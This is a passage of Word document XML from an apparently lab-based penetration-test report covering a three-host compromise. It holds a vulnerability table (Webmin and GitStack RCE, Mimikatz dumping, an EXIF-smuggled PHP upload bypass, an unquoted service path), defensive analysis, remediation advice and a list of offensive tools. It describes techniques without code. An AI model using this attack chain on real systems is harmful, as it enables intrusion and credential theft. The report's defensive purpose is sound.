        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploited an unquoted service path (SystemExplorerHelpService) with a custom C# wrapper delivered over SMB → SYSTEM on the final host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracted and exfiltrated the SAM/SYSTEM hives, cracked offline with secretsdump.py → full, verifiable compromise of all three hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Vulnerability &amp; Impact Summary</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3900"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2600"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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CentOS Web Server (Ext.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Webmin unauthenticated command injection (passwd_change.cgi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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CVE-2019-15107</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Remote Code Execution as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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GitStack Server (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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GitStack 2.3.10 unauthenticated Python RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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EDB-ID 43777</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Remote Code Execution as NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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GitStack Server (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Cleartext credentials recoverable via Mimikatz (LSA/SAM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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CWE-522</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Credential theft, lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Thomas' Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Unrestricted file upload — weak extension filter + getimagesize() bypass via EXIF metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Remote Code Execution as local user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Thomas' Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Unquoted service path (SystemExplorerHelpService)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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CWE-428</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Privilege escalation to NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Thomas' Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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SAM/SYSTEM hive exposure via local reg.exe save</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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CWE-522</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Full offline credential compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Defensive Analysis (Blue Team Perspective)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reviewing the chain from a defender's viewpoint highlights several independent control failures, any one of which — if remediated — would have broken the attack path at that stage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1 Patch &amp; Vulnerability Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Webmin and GitStack were both running versions with publicly disclosed, unauthenticated RCE vulnerabilities. A basic vulnerability-management/patching cadence would have removed both initial entry points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2 Network Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">While some internal segmentation existed (the final host was not directly reachable from the first pivot), it was insufficient to prevent lateral traversal once an intermediate host was compromised — segmentation should assume any single host may be breached and limit east-west traffic accordingly (e.g. host-based firewalls, VLAN ACLs restricting server-to-workstation traffic).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3 Credential Hygiene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Root's SSH private key being readable and directly reusable after a web-application compromise removed the need for repeated exploitation and provided durable persistence — private keys should be passphrase-protected and access to them audited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Password reuse between a Windows local account (Thomas) and the internal web application's Basic Auth credentials allowed a single cracked password to grant access across unrelated systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Local SAM database exposure via Mimikatz/registry hive extraction was possible because local administrator-equivalent access was obtainable at all — enforcing LAPS-style unique local admin passwords would have prevented hash reuse across hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.4 Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The file-upload validation relied on a blacklist-adjacent extension check and a single content-based check (getimagesize()) that does not verify the absence of embedded executable content — uploads should be validated with strict allow-listing, re-encoding of images (stripping metadata) rather than trusting the original file, and should never be stored in a web-executable directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.5 Endpoint Defense</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint AV/Defender detected modern/common offensive tooling (standard nc.exe, Mimikatz) but was bypassed using an older netcat build and manual registry hive extraction — signature-based detection alone is insufficient; behavioral/EDR-based detection of process ancestry (a web server spawning cmd.exe/PowerShell) and of reg.exe save HKLM\SAM would have flagged this activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.6 Windows Service Hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The unquoted, attacker-writable service path is a long-standing, easily-detected misconfiguration class — routine auditing of service binary paths and permissions (e.g. with tools like PowerUp/WinPEAS or manual sc qc / icacls review) would have caught this before an attacker could.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch or decommission Webmin and GitStack; if legacy tooling must remain, isolate it behind additional authentication and restrict its exposure to only the hosts that require it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotate all credentials encountered during this engagement, including the compromised SSH key, the cracked Windows password, and any local Administrator account hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement unique, randomized local administrator passwords per host (e.g. Microsoft LAPS) to prevent hash reuse across the environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a strict server-to-workstation network policy that limits which services internal servers may initiate connections to, reducing the blast radius of a single compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild the file upload feature to use strict allow-listing, re-encode/re-render uploaded images server-side, and store uploads outside any web-executable path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all Windows services for unquoted paths and weak file/folder permissions across the estate; remediate or apply compensating ACLs immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy EDR with behavioral detection rather than relying solely on signature-based AV, and alert on sensitive actions such as SAM/SYSTEM hive exports and LSASS access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce password-uniqueness policies (or a password manager/SSO strategy) to eliminate credential reuse between infrastructure accounts and application accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13. Tools Used</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3200"/>
        <w:gridCol w:w="7800"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7800"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</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Nmap (incl. static binary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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External and internal port/service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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CVE-2019-15107 PoC (MuirlandOracle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Webmin RCE exploitation</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SSHuttle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Transparent VPN-like pivot over SSH into the internal subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Socat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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TCP relay to route the Windows reverse shell back through the CentOS pivot</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EDB-ID 43777 (Python2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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GitStack RCE exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Intercepting/repeating the GitStack RCE HTTP requests</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Evil-WinRM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Authenticated PowerShell access over WinRM (password and pass-the-hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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xfreerdp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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RDP access with shared drive for file transfer</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Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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LSA/SAM credential dumping on the GitStack host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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CrackStation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Offline hash cracking</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Chisel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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SOCKS5 reverse tunnel to reach the third, most isolated host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Proxychains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Routing local tools through the Chisel SOCKS proxy</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Empire Invoke-Portscan.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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In-memory PowerShell port scanning from the second host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Git / GitTools techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Recovering the website source tree from the exposed Website.git repository</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exiftool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Embedding a PHP payload inside JPEG EXIF metadata (upload-filter bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
